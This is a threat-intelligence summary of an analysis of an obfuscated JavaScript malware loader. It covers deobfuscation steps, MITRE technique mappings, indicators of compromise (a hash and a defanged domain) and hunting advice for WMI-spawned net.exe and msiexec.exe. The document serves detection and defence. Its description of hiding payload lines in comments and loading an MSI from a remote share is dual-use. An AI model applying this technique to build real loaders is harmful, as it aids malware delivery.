Keypoints
- Initial sample (SHA256 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9) is a large 845KB JavaScript file indicating heavy obfuscation.
- The file contains thousands of junk comments generated by an obfuscator; functional code appears sparsely between these comments.
- Removing lines that begin with ‘//’ via regex reduces the file to ~37 lines, but those lines reveal logic that reads comment-lines beginning with ‘////’ and executes them.
- Using CyberChef with a regex capture group to extract lines starting with ‘////’ yields the embedded second-stage script.
- The deobfuscated script maps a network share at sokingscrosshotel[.]com via ‘net use’, then runs upd.msi with msiexec.exe and later removes the mapped drive with WScript.Network.RemoveNetworkDrive.
- Execution is performed via WMI (wmiprvse.exe spawning net.exe/msiexec.exe), providing clear detection opportunities by hunting for these process creation patterns and uncommon share names.
MITRE Techniques
- [T1027] Obfuscated Files or Information – The script uses extensive junk comments to hide functionality (‘the script contains a huge number of junk comments’).
- [T1064] Scripting – Malicious actions are implemented in a JavaScript file that is delivered and executed as script code (‘the malware is delivered and executed as a JavaScript file’).
- [T1047] Windows Management Instrumentation – WMI is leveraged to execute commands such as net.exe and msiexec.exe (‘The malware leverages wmi to execute the net.exe and msiexec.exe commands’).
- [T1105] Ingress Tool Transfer (Remote File Copy) – The loader retrieves and executes a remote upd.msi file from a network share (‘the malware attempts to execute an upd.msi files using msiexec.exe’).
- [T1135] Network Share Discovery/Use – The script maps and uses a network share (sokingscrosshotel[.]com) via ‘net use’ for payload retrieval (‘the malware attempts to map to a network drive at sokingscrosshotel[.]com’).
- [T1106] Native API – The code uses the WScript.Network object’s RemoveNetworkDrive method to remove the mapped share after execution (‘the network drive is removed using RemoveNetworkDrive from the WScript.Network object’).
- [T1059] Command and Scripting Interpreter – The actor spawns system commands (net.exe, msiexec.exe) through script-driven execution to perform file transfer and execution (‘Once the drive is connected, the malware attempts to execute an upd.msi files using msiexec.exe’).
Indicators of Compromise
- [SHA256] initial sample – 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9
- [Domain] network share used as payload host – sokingscrosshotel[.]com
- [File name] remote installer executed – upd.msi
- [Process names] execution orchestration – wmiprvse.exe spawning net.exe, msiexec.exe
- [Repository/uploader] sample source/context – Malware Bazaar upload by pr0xylife
The technical procedure begins by fetching the large JavaScript sample (SHA256 71fb25c…) identified on Malware Bazaar; its 845KB size and Visual Studio Code minimap reveal thousands of obfuscating comment lines inserted by an obfuscator, with intermittent chunks of functional code between them. Analysts should open the file in a text editor to confirm the pattern: most lines are junk comments, while meaningful code appears sporadically and the script contains logic to read its own contents and treat comment-lines as executable payload.
To deobfuscate, remove single-line comments and then extract the deeper payload: first apply a regex that strips lines beginning with ‘//’ to reduce noise, which yields a minimal scaffold (~37 lines) that reads comment blocks. Next, extract lines that begin with four slashes (‘////’) using CyberChef or another regex-capable tool with a capture group and “List capture groups” to isolate the embedded script without the leading slashes. This reveals the second/third-stage script content for review.
The revealed payload maps a network share (sokingscrosshotel[.]com) via ‘net use’, executes upd.msi using msiexec.exe, and then removes the mapped drive via WScript.Network.RemoveNetworkDrive; WMI is used to spawn these processes (wmiprvse.exe -> net.exe/msiexec.exe). For detection and hunting, collect process creation logs and look for wmiprvse.exe spawning net.exe or msiexec.exe with uncommon share or drive names, and monitor for executions of msiexec.exe referencing remote installers or uncommon UNC paths.
Read more: https://embee-research.ghost.io/latrodectus-script-deobfuscation/